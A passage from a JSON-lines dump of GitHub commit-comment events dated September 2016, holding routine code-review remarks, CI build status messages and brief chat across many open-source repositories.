проверить совпадение размеров очереди и значения первого/последнего элемента (если такие методы ты реализуешь). Можно и после каждой операции сравнивать всю последовательность элементов в очередях, но это будет дольше работать."}},"created_at":"2016-09-02T20:51:46Z"}
{"id":"4510645911","type":"CommitCommentEvent","actor":{"login":"bsongis"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":18886682,"position":12,"line":421,"path":"radio/src/gui/480x272/radio_setup.cpp","commit_id":"d8a00c3f3dd9655ca6966cede360f0e88bb2f5e1","created_at":"2016-09-02T20:51:49Z","updated_at":"2016-09-02T20:51:49Z","body":"Take care to add an entry into the MENU macro call above"}},"created_at":"2016-09-02T20:51:49Z"}
{"id":"4510646357","type":"CommitCommentEvent","actor":{"login":"JeroenVinke"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":18886685,"position":null,"line":null,"path":null,"commit_id":"f79496a12d7310fee46c440b04398a30e9a148d5","created_at":"2016-09-02T20:51:55Z","updated_at":"2016-09-02T20:51:55Z","body":"> How could any human read or write id = id.replace(/\\bv?(?:0|[1-9]\\d*)\\.(?:0|[1-9]\\d*)\\.(?:0|[1-9]\\d*)(?:-[\\da-z\\-]+(?:\\.[\\da-z\\-]+)*)?(?:\\+[\\da-z\\-]+(?:\\.[\\da-z\\-]+)*)?\\b/ig, '');?\r\n\r\nI can read it just fine, but I do not understand it at all ;)"}},"created_at":"2016-09-02T20:51:55Z"}
{"id":"4510647104","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18886687,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-02T20:52:07Z","updated_at":"2016-09-02T20:52:07Z","body":"Congrats as well!"}},"created_at":"2016-09-02T20:52:07Z"}
{"id":"4510650244","type":"CommitCommentEvent","actor":{"login":"damien5314"},"repo":{"name":"quizlet/scissors"},"payload":{"comment":{"id":18886689,"position":null,"line":null,"path":null,"commit_id":"6bc9a1c5695b99de0c1792185e28aafa2b64983e","created_at":"2016-09-02T20:52:52Z","updated_at":"2016-09-02T20:52:52Z","body":"@ddpatel2606 That's actually not supported in this fork, sorry. You should be able to do the cropping of the actual image file yourself using some technique in this SO post. But for our use case we want the cropped image to remain the full rectangle. http://stackoverflow.com/questions/11932805/cropping-circular-area-from-bitmap-in-android"}},"created_at":"2016-09-02T20:52:52Z"}
{"id":"4510651786","type":"CommitCommentEvent","actor":{"login":"bsongis"},"repo":{"name":"schwabe/opentx"},"payload":{"comment":{"id":18886693,"position":null,"line":null,"path":null,"commit_id":"e9c91cd0ff709fb88f9cdeb36224b309a39c4843","created_at":"2016-09-02T20:53:15Z","updated_at":"2016-09-02T20:53:15Z","body":"When you have time you help me for my OSX VM?"}},"created_at":"2016-09-02T20:53:15Z"}
{"id":"4510653580","type":"CommitCommentEvent","actor":{"login":"adriatic"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":18886696,"position":null,"line":null,"path":null,"commit_id":"f79496a12d7310fee46c440b04398a30e9a148d5","created_at":"2016-09-02T20:53:42Z","updated_at":"2016-09-02T20:53:42Z","body":"That **made me laugh, loud** - something that has not happen to me for a long time."}},"created_at":"2016-09-02T20:53:42Z"}
{"id":"4510653833","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":18886697,"position":2,"line":210,"path":"ext/standard/image.c","commit_id":"44e43a4738a45797457d6fe740bf33148a5e34c1","created_at":"2016-09-02T20:53:45Z","updated_at":"2016-09-02T20:53:45Z","body":"Moving the `ecalloc` nearer to the first use will clean the first 2 ifs because you wont need to free it again "}},"created_at":"2016-09-02T20:53:45Z"}
{"id":"4510655122","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18886702,"position":null,"line":null,"path":null,"commit_id":"a9514f30aa56490fe49b2010e28a25144050723b","created_at":"2016-09-02T20:54:07Z","updated_at":"2016-09-02T20:54:07Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2325 of 2326 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a9514f30aa56490fe49b2010e28a25144050723b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T20:54:07Z"}
{"id":"4510656246","type":"CommitCommentEvent","actor":{"login":"rmaz"},"repo":{"name":"shatlykuber/buck"},"payload":{"comment":{"id":18886704,"position":null,"line":null,"path":null,"commit_id":"89b999f1d6d1c314f3717d1f0c1b75bf77a8c162","created_at":"2016-09-02T20:54:22Z","updated_at":"2016-09-02T20:54:22Z","body":"I would be inclined to use a small method that gets the product type for the node, but otherwise looks good. Something like:\r\n\r\n```lang=java\r\nProductType getProductType(TargetNode node) {\r\n   Flavors flavors = targetNode.getBuildTarget().getFlavors();\r\n   if (flavors.contains(AppleDescriptions.FRAMEWORK_FLAVOR)) {\r\n       return ProductType.FRAMEWORK;\r\n   }  else if (flavors.contains(CxxDescriptionEnhancer.SHARED_FLAVOR)) {\r\n       return ProductType.DYNAMIC_LIBRARY;\r\n   } else {\r\n       return ProductType.STATIC_LIBRARY;\r\n   }\r\n}\r\n```"}},"created_at":"2016-09-02T20:54:22Z"}
{"id":"4510658656","type":"CommitCommentEvent","actor":{"login":"drdanz"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":18886713,"position":null,"line":null,"path":null,"commit_id":"14985b3a2ff665f8f27d084a3cfa60ced8270ad5","created_at":"2016-09-02T20:54:55Z","updated_at":"2016-09-02T20:54:55Z","body":"That's more or less equivalent to `include(${CMAKE_CURRENT_SOURCE_DIR} ${CMAKE_CURRENT_BINARY_DIR})"}},"created_at":"2016-09-02T20:54:55Z"}
{"id":"4510659317","type":"CommitCommentEvent","actor":{"login":"vegarringdal"},"repo":{"name":"monterey-framework/monterey"},"payload":{"comment":{"id":18886715,"position":null,"line":null,"path":null,"commit_id":"f79496a12d7310fee46c440b04398a30e9a148d5","created_at":"2016-09-02T20:55:06Z","updated_at":"2016-09-02T20:55:06Z","body":"lol :-)"}},"created_at":"2016-09-02T20:55:06Z"}
{"id":"4510659769","type":"CommitCommentEvent","actor":{"login":"paulkerschen"},"repo":{"name":"ets-berkeley-edu/calcentral"},"payload":{"comment":{"id":18886718,"position":6,"line":61,"path":"src/assets/templates/widgets/billing_summary.html","commit_id":"44f6fd95bbb84bfa647b9e326e95c40b6b7ddd58","created_at":"2016-09-02T20:55:12Z","updated_at":"2016-09-02T20:55:12Z","body":"@raydavis Should your fix in the line above also be applied to this dynamic CSS?"}},"created_at":"2016-09-02T20:55:12Z"}
{"id":"4510663225","type":"CommitCommentEvent","actor":{"login":"mikhail-m1"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18886730,"position":20,"line":42,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"8a17f7ab8a09008d4e8bc88c75f1286d3ff6aa63","created_at":"2016-09-02T20:56:04Z","updated_at":"2016-09-02T20:56:04Z","body":"OK, I'll return vector back"}},"created_at":"2016-09-02T20:56:04Z"}
{"id":"4510665730","type":"CommitCommentEvent","actor":{"login":"raydavis"},"repo":{"name":"ets-berkeley-edu/calcentral"},"payload":{"comment":{"id":18886736,"position":6,"line":61,"path":"src/assets/templates/widgets/billing_summary.html","commit_id":"44f6fd95bbb84bfa647b9e326e95c40b6b7ddd58","created_at":"2016-09-02T20:56:38Z","updated_at":"2016-09-02T20:56:38Z","body":"By gum, it surely should, @paulkerschen . This is the second time I've suffered from tunnel vision in this template!"}},"created_at":"2016-09-02T20:56:38Z"}
{"id":"4510668513","type":"CommitCommentEvent","actor":{"login":"mikhail-m1"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18886740,"position":34,"line":58,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"8a17f7ab8a09008d4e8bc88c75f1286d3ff6aa63","created_at":"2016-09-02T20:57:13Z","updated_at":"2016-09-02T20:57:13Z","body":"I think disambuguatiror always has same size, but in any case with slash it's look better"}},"created_at":"2016-09-02T20:57:13Z"}
{"id":"4510675461","type":"CommitCommentEvent","actor":{"login":"annwilliamson"},"repo":{"name":"annwilliamson/hello-world-2"},"payload":{"comment":{"id":18886754,"position":null,"line":null,"path":null,"commit_id":"7ea4b957db88cc6a2bcb60d50d2ceffc9cc2a09f","created_at":"2016-09-02T20:58:45Z","updated_at":"2016-09-02T20:58:45Z","body":"Practice repository for Ann; with 2nd comment"}},"created_at":"2016-09-02T20:58:45Z"}
{"id":"4510676159","type":"CommitCommentEvent","actor":{"login":"dagar"},"repo":{"name":"mavlink/mavlink"},"payload":{"comment":{"id":18886756,"position":null,"line":null,"path":null,"commit_id":"8201e5fa8d7e9389720499630601ba8e4468204d","created_at":"2016-09-02T20:58:54Z","updated_at":"2016-09-02T20:58:54Z","body":"@Ahrovan PX4 and QGroundControl only use what's in the common mavlink message set."}},"created_at":"2016-09-02T20:58:54Z"}
{"id":"4510682836","type":"CommitCommentEvent","actor":{"login":"rtlanceroad"},"repo":{"name":"rtlanceroad/gentoo-ebuilds"},"payload":{"comment":{"id":18886772,"position":null,"line":null,"path":null,"commit_id":"e2551e7349010c5f35c78c4450dc9a3c5ca724fe","created_at":"2016-09-02T21:00:29Z","updated_at":"2016-09-02T21:00:29Z","body":"Funtoo linux has use `introspection` globally disabled somewhere, that why it doesn't work. I dont want to enable it globally. funtoo side, I intend to leave it aside and wont fix it."}},"created_at":"2016-09-02T21:00:29Z"}
{"id":"4510685162","type":"CommitCommentEvent","actor":{"login":"florianluediger"},"repo":{"name":"instantshare/instantshare"},"payload":{"comment":{"id":18886777,"position":17,"line":15,"path":"src/res/instantshare.default","commit_id":"ea2afa5d4924143b876cbafd96b1590e50958a47","created_at":"2016-09-02T21:01:01Z","updated_at":"2016-09-02T21:01:01Z","body":"I would also mention that if the value is set to `False`, instead of copying the URL to the clipboard, a browser window opens with the uploaded medium.\r\n\r\n**Maybe better:** _Wether or not to automatically copy the public URL to the uploaded medium to the clipboard. If set to False, a browser window opens, showing the uploaded content._"}},"created_at":"2016-09-02T21:01:01Z"}
{"id":"4510685407","type":"CommitCommentEvent","actor":{"login":"mschae"},"repo":{"name":"mschae/boltex"},"payload":{"comment":{"id":18886778,"position":24,"line":null,"path":"lib/boltex/bolt.ex","commit_id":"5654e5f14dd42fb36268995323dc526d335d00a9","created_at":"2016-09-02T21:01:07Z","updated_at":"2016-09-02T21:01:07Z","body":"Integration tests are close..."}},"created_at":"2016-09-02T21:01:07Z"}
{"id":"4510686195","type":"CommitCommentEvent","actor":{"login":"MerryMage"},"repo":{"name":"MerryMage/dynarmic"},"payload":{"comment":{"id":18886780,"position":null,"line":null,"path":null,"commit_id":"e8764c129ff87d1ef690afd83caa72ad04f478bc","created_at":"2016-09-02T21:01:18Z","updated_at":"2016-09-02T21:01:18Z","body":"Much better, thanks @lioncash!"}},"created_at":"2016-09-02T21:01:18Z"}
{"id":"4510689419","type":"CommitCommentEvent","actor":{"login":"JimViebke"},"repo":{"name":"JimViebke/IslandMUD"},"payload":{"comment":{"id":18886784,"position":null,"line":null,"path":null,"commit_id":"c1238ae78a5a3d2fd8ae6ea1d9032afa1d1f84bc","created_at":"2016-09-02T21:02:04Z","updated_at":"2016-09-02T21:02:04Z","body":"Fixes #224."}},"created_at":"2016-09-02T21:02:04Z"}
{"id":"4510689515","type":"CommitCommentEvent","actor":{"login":"johnfg12"},"repo":{"name":"MyM-ModpackTeam/hypovolemia"},"payload":{"comment":{"id":18886785,"position":null,"line":null,"path":null,"commit_id":"e60ed06309c5b706a99b3efe38091a8e05d761ad","created_at":"2016-09-02T21:02:06Z","updated_at":"2016-09-02T21:02:06Z","body":"e plan is tonpush this update then I'll go through and fix quests"}},"created_at":"2016-09-02T21:02:06Z"}
{"id":"4510690539","type":"CommitCommentEvent","actor":{"login":"friedger"},"repo":{"name":"openintents/notepad"},"payload":{"comment":{"id":18886788,"position":5,"line":292,"path":"OneCloudAppToApp/src/com/box/onecloud/android/OneCloudData.java","commit_id":"69fb3976b856c756abf75bc758da80f605888667","created_at":"2016-09-02T21:02:20Z","updated_at":"2016-09-02T21:02:20Z","body":"@faisal-hameed You have missed to remove the inputStream variable at the end."}},"created_at":"2016-09-02T21:02:20Z"}
{"id":"4510698440","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18886799,"position":null,"line":null,"path":null,"commit_id":"ae6b14482551148e6a2152218e6548c01d2253b4","created_at":"2016-09-02T21:04:18Z","updated_at":"2016-09-02T21:04:18Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 14](http://teamcity.otenv.com/viewLog.html?buildId=5161515&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T21:04:18Z"}
{"id":"4510699749","type":"CommitCommentEvent","actor":{"login":"mystor"},"repo":{"name":"mystor/icecc-osx-moztor"},"payload":{"comment":{"id":18886804,"position":null,"line":null,"path":null,"commit_id":"1359def1474462503e927947f66c9bfba5974b72","created_at":"2016-09-02T21:04:35Z","updated_at":"2016-09-02T21:04:35Z","body":"If I remember correctly, I just installed the prerequisites from homebrew and built it locally. I don't think I did anything special, which is why I didn't include instructions in the repository.\r\n\r\nIn general this repository could use a lot more explanation. It was originally created just as a place for us to dump our binaries for distribution."}},"created_at":"2016-09-02T21:04:35Z"}
{"id":"4510701365","type":"CommitCommentEvent","actor":{"login":"orchid666"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18886808,"position":null,"line":null,"path":null,"commit_id":"c9a6f0871393bde403b097df0b12cbb9f59d454e","created_at":"2016-09-02T21:04:58Z","updated_at":"2016-09-02T21:04:58Z","body":"This modification creates an error:\r\n File \"/Users/Rodolphe/Documents/Pokebot/PokemonGo-Bot/pokemongo_bot/cell_workers/follow_spiral.py\", line 23, in initialize\r\n    self.points = cycle(self.spiral+list(reversed(self.spiral)[1:-1]))\r\nTypeError: 'listreverseiterator' object has no attribute '__getitem__'"}},"created_at":"2016-09-02T21:04:58Z"}
{"id":"4510703079","type":"CommitCommentEvent","actor":{"login":"nikomatsakis"},"repo":{"name":"mikhail-m1/rust"},"payload":{"comment":{"id":18886814,"position":34,"line":58,"path":"src/librustc_incremental/persist/directory.rs","commit_id":"8a17f7ab8a09008d4e8bc88c75f1286d3ff6aa63","created_at":"2016-09-02T21:05:24Z","updated_at":"2016-09-02T21:05:24Z","body":"the disambiguator is an arbitrary string provided on the command-line; in practice cargo tends to give certain sizes, but there are no guarantees."}},"created_at":"2016-09-02T21:05:24Z"}
{"id":"4510704335","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18886816,"position":null,"line":null,"path":null,"commit_id":"ae6b14482551148e6a2152218e6548c01d2253b4","created_at":"2016-09-02T21:05:42Z","updated_at":"2016-09-02T21:05:42Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 14](http://teamcity.otenv.com/viewLog.html?buildId=5161515&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:24"}},"created_at":"2016-09-02T21:05:42Z"}
{"id":"4510712629","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18886835,"position":null,"line":null,"path":null,"commit_id":"0660f77e933455605c32da5a567fe09504515a0d","created_at":"2016-09-02T21:07:38Z","updated_at":"2016-09-02T21:07:38Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 15](http://teamcity.otenv.com/viewLog.html?buildId=5161536&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T21:07:38Z"}
{"id":"4510713475","type":"CommitCommentEvent","actor":{"login":"michealharker"},"repo":{"name":"6697/secretlounge"},"payload":{"comment":{"id":18886836,"position":null,"line":null,"path":null,"commit_id":"d81c6c4b6bc1d759ba9e6fd7fb1a759df92eb835","created_at":"2016-09-02T21:07:50Z","updated_at":"2016-09-02T21:07:50Z","body":":ok_hand:"}},"created_at":"2016-09-02T21:07:50Z"}
{"id":"4510714963","type":"CommitCommentEvent","actor":{"login":"philmander"},"repo":{"name":"philmander/browser-bunyan"},"payload":{"comment":{"id":18886839,"position":29,"line":25,"path":"README.md","commit_id":"f95165cc8364d93f6bf605048d1166783a7d2a40","created_at":"2016-09-02T21:08:11Z","updated_at":"2016-09-02T21:08:11Z","body":"Pretty much, yes. Just go with what's provided in the `dist` directory\n\nOn 2 Sep 2016 4:06 pm, \"Igor Savin\" <notifications@github.com> wrote:\n\n> How would that work with the angular config instance, which doesn't have\n> window object?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/philmander/browser-bunyan/commit/f95165cc8364d93f6bf605048d1166783a7d2a40#commitcomment-18885830>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAJLuciwyZB5B63NnETgKr71BBrXAnlcks5qmIHSgaJpZM4J0CyW>\n> .\n>\n"}},"created_at":"2016-09-02T21:08:11Z"}
{"id":"4510716528","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"crunchyNYC/Stockfish2016"},"payload":{"comment":{"id":18886841,"position":null,"line":null,"path":null,"commit_id":"d6d530757498e4657d11cf86099323b1d372ff75","created_at":"2016-09-02T21:08:32Z","updated_at":"2016-09-02T21:08:32Z","body":"I think that this does not scale well linearly with pawns: king can block 1 pawn (while under 1 pawn perhaps it could even be less than 37), often it can help block 2 pawns (but that depends on how distant their files are! there should be a fast way to calculate that...), while with more than 2 pawns its role will likely become less crucial, so IMHO a normal ScaleFactor is fine..."}},"created_at":"2016-09-02T21:08:32Z"}
{"id":"4510718674","type":"CommitCommentEvent","actor":{"login":"cheapscates"},"repo":{"name":"jeanphorn/wordlist"},"payload":{"comment":{"id":18886844,"position":null,"line":null,"path":null,"commit_id":"2171d81c4f8d2eb7cdf72f9938bb049f90e592a6","created_at":"2016-09-02T21:09:05Z","updated_at":"2016-09-02T21:09:05Z","body":"wanna see it"}},"created_at":"2016-09-02T21:09:05Z"}
{"id":"4510719000","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18886848,"position":null,"line":null,"path":null,"commit_id":"0660f77e933455605c32da5a567fe09504515a0d","created_at":"2016-09-02T21:09:10Z","updated_at":"2016-09-02T21:09:10Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 15](http://teamcity.otenv.com/viewLog.html?buildId=5161536&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:33"}},"created_at":"2016-09-02T21:09:10Z"}
{"id":"4510722815","type":"CommitCommentEvent","actor":{"login":"bixu"},"repo":{"name":"habitat-sh/habitat"},"payload":{"comment":{"id":18886854,"position":null,"line":null,"path":null,"commit_id":"0ade9b16af8d21a6f0959680d1f287e07d5e3def","created_at":"2016-09-02T21:10:08Z","updated_at":"2016-09-02T21:10:08Z","body":"❤️"}},"created_at":"2016-09-02T21:10:08Z"}
{"id":"4510724968","type":"CommitCommentEvent","actor":{"login":"projectkk2glider"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":18886859,"position":12,"line":421,"path":"radio/src/gui/480x272/radio_setup.cpp","commit_id":"d8a00c3f3dd9655ca6966cede360f0e88bb2f5e1","created_at":"2016-09-02T21:10:39Z","updated_at":"2016-09-02T21:10:39Z","body":"Ups, will do."}},"created_at":"2016-09-02T21:10:39Z"}
{"id":"4510727737","type":"CommitCommentEvent","actor":{"login":"basudhamisra"},"repo":{"name":"basudhamisra/understanding-git-github"},"payload":{"comment":{"id":18886867,"position":null,"line":null,"path":null,"commit_id":"1d7879fa660c902cf6bcba890893b00a1f53656c","created_at":"2016-09-02T21:11:20Z","updated_at":"2016-09-02T21:11:20Z","body":"Let's see whether I can merge the write up of these two files into one or not."}},"created_at":"2016-09-02T21:11:20Z"}
{"id":"4510731385","type":"CommitCommentEvent","actor":{"login":"chcosta"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18886872,"position":48,"line":48,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-02T21:12:15Z","updated_at":"2016-09-02T21:12:15Z","body":"Would it be problematic to make the \"packageSource\" a part of the \".toolsVersion\" file?  I find that I'm often testing buildtools changes using a local buildtools build and remembering to update / undo changes in two different files (init-tools.cmd and BuildToolsVersion.txt today), is annoying."}},"created_at":"2016-09-02T21:12:15Z"}
{"id":"4510732226","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886873,"position":8,"line":8,"path":"ALGORYTHMS/task2/randoms_list.h","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-02T21:12:28Z","updated_at":"2016-09-02T21:12:28Z","body":"ИМХО, можно было обойтись функцией."}},"created_at":"2016-09-02T21:12:28Z"}
{"id":"4510732650","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886874,"position":43,"line":43,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-02T21:12:33Z","updated_at":"2016-09-02T21:12:33Z","body":"Typo: s/priv/prev/ – previous."}},"created_at":"2016-09-02T21:12:33Z"}
{"id":"4510732870","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886875,"position":44,"line":44,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-02T21:12:36Z","updated_at":"2016-09-02T21:12:36Z","body":"UB на пустом списке!"}},"created_at":"2016-09-02T21:12:36Z"}
{"id":"4510733036","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886876,"position":45,"line":45,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-02T21:12:39Z","updated_at":"2016-09-02T21:12:39Z","body":"UB на списке из одного элемента!"}},"created_at":"2016-09-02T21:12:39Z"}
{"id":"4510733131","type":"CommitCommentEvent","actor":{"login":"dekrain"},"repo":{"name":"LLK/scratch-vm"},"payload":{"comment":{"id":18886877,"position":5,"line":43,"path":"playground/index.html","commit_id":"3eb3e0e22957923a4d08e7a91f9ff065c3f3b3ac","created_at":"2016-09-02T21:12:41Z","updated_at":"2016-09-02T21:12:41Z","body":"It didn't work b/c you must replace also\r\n`</textarea>` with `</input>`"}},"created_at":"2016-09-02T21:12:41Z"}
{"id":"4510733322","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886879,"position":67,"line":67,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-02T21:12:43Z","updated_at":"2016-09-02T21:12:43Z","body":"UB на пустом списке!"}},"created_at":"2016-09-02T21:12:43Z"}
{"id":"4510733598","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886880,"position":76,"line":76,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-02T21:12:47Z","updated_at":"2016-09-02T21:12:47Z","body":"Рекурсия отнимает O(N) дополнительной памяти, да ещё и в стеке.\r\nСтек обычно гораздо меньше кучи, а его переполнение – UB.\r\nА предыдущий вариант требует всего O(1) дополнительной памяти."}},"created_at":"2016-09-02T21:12:47Z"}
{"id":"4510733791","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18886881,"position":98,"line":98,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-02T21:12:50Z","updated_at":"2016-09-02T21:12:50Z","body":"Надо обязательно проверять краевые случаи:\r\n* пустой список;\r\n* список из одного элемента;\r\n* список из двух элементов."}},"created_at":"2016-09-02T21:12:50Z"}
{"id":"4510735030","type":"CommitCommentEvent","actor":{"login":"dubaaron"},"repo":{"name":"dubaaron/fitnesse"},"payload":{"comment":{"id":18886883,"position":null,"line":null,"path":null,"commit_id":"ab4d303415b3380928f404b9f48035d5b8b0c754","created_at":"2016-09-02T21:13:08Z","updated_at":"2016-09-02T21:13:08Z","body":"Also added some needed spaces."}},"created_at":"2016-09-02T21:13:08Z"}
{"id":"4510735616","type":"CommitCommentEvent","actor":{"login":"chcosta"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18886887,"position":49,"line":49,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-02T21:13:16Z","updated_at":"2016-09-02T21:13:16Z","body":"RepositoryRoot?  The default for RepositoryRoot might be Get-Location though."}},"created_at":"2016-09-02T21:13:16Z"}
{"id":"4510746299","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18886906,"position":49,"line":49,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-02T21:15:59Z","updated_at":"2016-09-02T21:15:59Z","body":"Good catch will fix."}},"created_at":"2016-09-02T21:15:59Z"}
{"id":"4510751650","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18886917,"position":48,"line":48,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-02T21:17:23Z","updated_at":"2016-09-02T21:17:23Z","body":"I wouldn't put that in .toolsVersion. I would instead use an enviroment variable for that level of stuff, similar to what I've done for init-tools (https://github.com/dotnet/corefx/blob/master/init-tools.cmd#L9) (https://github.com/dotnet/buildtools/wiki/Local-testing-of-BuildTools-in-another-repo) and adding a force option would be good. "}},"created_at":"2016-09-02T21:17:23Z"}
{"id":"4510752657","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18886920,"position":null,"line":null,"path":null,"commit_id":"1703b005e4e1abff86c28e13504d91b20616a2fd","created_at":"2016-09-02T21:17:39Z","updated_at":"2016-09-02T21:17:39Z","body":"@muqsit I was hoping for something a little more significant, but by the time I committed changes it was too late (^_^) :D"}},"created_at":"2016-09-02T21:17:39Z"}
{"id":"4510752956","type":"CommitCommentEvent","actor":{"login":"svenluijten"},"repo":{"name":"PHPMap/PHPMap"},"payload":{"comment":{"id":18886921,"position":14,"line":33,"path":"CONTRIBUTING.md","commit_id":"0bda0b8cf7a670f1c84633f1e77802363e7ca87d","created_at":"2016-09-02T21:17:44Z","updated_at":"2016-09-02T21:17:44Z","body":"not sure what happened here, I only edited line 24"}},"created_at":"2016-09-02T21:17:44Z"}
{"id":"4510755255","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18886926,"position":null,"line":null,"path":null,"commit_id":"ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6","created_at":"2016-09-02T21:18:21Z","updated_at":"2016-09-02T21:18:21Z","body":"AddLoggingToInstaller (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2366 of 2366 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-02T21:18:21Z"}
